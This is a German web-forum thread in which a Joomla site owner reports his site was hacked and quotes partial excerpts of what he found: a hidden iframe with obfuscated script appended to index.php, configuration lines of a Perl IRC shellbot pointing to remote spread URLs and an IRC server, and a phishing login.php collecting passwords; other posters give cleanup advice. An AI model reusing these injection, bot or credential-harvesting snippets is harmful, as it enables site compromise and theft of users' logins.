Thema: Site gehackt

Guten Abend zusammen:

ich habe heute entdeckt, dass meine Index-Datei im Joomla Root modifiziert wurde. Und zwar wurde folgender Code am Ende angehängt:

<iframe src='http://url' width='1' height='1' style='visibility: hidden;'></iframe><script>function v4803c853d1c55(v4803c853d1d12){ function v4803c853d2200 () ......

Wie kann so etwas passieren und was ist nun am besten zu tun?
Im Voraus besten Dank!

seite offline nehmen, alle passwörter ändern, und hier in diesem forumteil mal in den anderen beiträgen schauen... das ist leider schon vielen hier im forum passiert, und es wurden schon ganz viele aufzählungen gegeben, was zu machen ist.

ok, schon dabei - besten Dank mal vorab...

was mich vor allem interessiert: wie lässt sich hier der Weg der Manipulation zurück verfolgen?

zeitpunkt: letzte änderung der index.php (zu sehen z.b. über ftp-programm). du musst davon ausgehen, dass alle index.php deiner unterordner auch betroffen sind (meistens die direkt einen ordner tiefer). ansonsten kannst du versuchen, über die logdatei deines webservers etwas zu erfahren. und es gibt hier im forum beschreibungen, welche komponenten unsicher sind, da musst du mal schauen, ob du davon was installiert hast, und updates machen, oder die ganz rausschmeißen.

Zwei Fragen noch:
1.) Wie kann ich den iFrame oben decodieren?
2.) Im Ordner 'images' befand sich eine Datei in.txt mit folgendem Inhalt (auszugsweise):

#!/usr/bin/perl



use IO::Socket::INET;

use HTTP::Request;

use LWP::UserAgent;

#####################################

#RFI By BraT/Sir|ToTTi | Kobra Crew#

#####################################

######################

# Configuracion #

# #

################################################## ####

#Nombre Del Proceso

my $processo = '/init_1/';

if (`ps uxw` =~ /init_1/)

{

exit;

}

#URL de la shell c99 o r57

################################################## ###

my $cmd=" 3,3||0,0||3,3||";

################################################## ###

#Tu spread para subir shellbot######################

my $spread="http://textingmsg.bravehost.com/safe.txt?";

################################################## ###

#Archivo necesario para dar las SAFEOFF Y SAFEON#####

my $id="http://textingmsg.bravehost.com/id.txt??";

################################################## ###

#Servidor del bot####################################

my $server="irc.valeriana.co****";

################################################## ###

#Puerto########################################### ###

my $porta="6667";

################################################## ###

#Nick del bot########################################

my $nickname ="Dark[".int(rand(212))."]";

################################################## ###

#Canal del bot#####################################

my $canale="#daystar";

################################################## ###

was hat es damit auf sich?

Besten Dank im Voraus...

und noch etwas:

im Joomla-Root befindet (besser befand) sich eine login.php mit folgendem Inhalt (auszugsweise):

<?

$ip = getenv("REMOTE_ADDR");
$message .= "Login ID (Online ID): ".$_POST['OnlineID']."\n";
$message .= "Password : ".$_POST['Password']."\n";
$message .= "IP: ".$ip."\n";
$message .= "---------Summoned By dark--------------\n";

mich würde interssieren wie dies geschehen ist, welche Komonenten/Module in welcher Version hast du installiert ? Hast du Ordner auf 777 ?

Mich auch...

So richtig auf dem aktuellsten Stand bin ich nicht, das ist mir bewusst. Liegt hauptsächlich daran, dass ich den CBE in Verbindung mit Virtuemart nutze. Und allein um da die korrekte Registrierung von Shop-Kunden hinzubekommen braucht man schon etliche Stunden Infosuche. Leider.

CBE ist aktuell - VM 1.0.12 - Joomla 1.0.15

Wahrscheinlich werde ich den ganzen Mist neu aufsetzen und die Sache diesmal ohne den CBE einrichten - anscheinend wird der ja eh nicht weiterentwickelt und die ganzen Workarounds sprengen fast schon die Grenze des Zumutbaren.

Vorerst ist zwar alles im grünen Bereich aber doch etwas zu experimentell für meinen Geschmack.

777 haben nur wenige (pic)Ordner im CBE und VM - darin ist jedenfalls nichts auffälliges vorhanden.

Im Zusammenhang mit der ganzen Sache kamen vor allem auch deutliche Zeichen bei der Frontend-Nutzung. Nach dem Ausloggen aus dem Admin-Bereich z.B. kam im IE stets die Meldung, dass das Skript 'Webshellanwendung' (oder so ähnlich) ausgeführt werden möchte... Auch das Laden der Bilder dauerte unverhältnismäßig lange. Und des Weiteren hat der Virenwächter stets beim Laden der Startseite Alarm geschlagen.

Vom Provider kam bisher keine Info und auch sonst ist kein offensichtlicher Schaden erkennbar - System läuft nach Bereinigung wieder und wird streng beobachtet. Beim ersten Anzeichen einer neuen Kompromitierung wird der ganze Mist gelöscht und die Site komplett neu aufgesetzt.

Ist zwar nicht wirklich schön aber auch nicht tragisch, da die Artikel von VM ja ex- und wieder importiert werden können und die Geschäftsfälle in der JTL-WaWi sind.

Mir graust es nur etwas vor der Kundenregistrierung, aber ohne CBE müsste es ja locker laufen.

Zu der aktuellen Sache: In der login.php im Joomla-root (die da sicherlich nicht hingehörte) sind auch eMail-Adressen enthalten. Ich würde schon gerne, wenn möglich die Sache rückverfolgen, denn offensichtlich war die Kompromitierung nicht wirklich erfolgreich und auch recht diletantisch. Wenn jemand eine Idee hat - ich höre gerne zu.

Die Url der Site lautet übrigens http://www.buschef.de

Besten Dank...

danke für die Info, klingt ja so als wenn da schon länger was am brodeln ist.. Ich würde Dir auf jeden Fall empfehlen Joomla neu aufzusetzen und auf die akt. Versiion von VM zu nutzen.. sie hier: http://www.joomla-downloads.de/siche...n-1.0.13a.html

P.S. falls es Dir hilft es gibt auch ein Hack für VM ohne Benutzeranmldung

Viel Erfolg !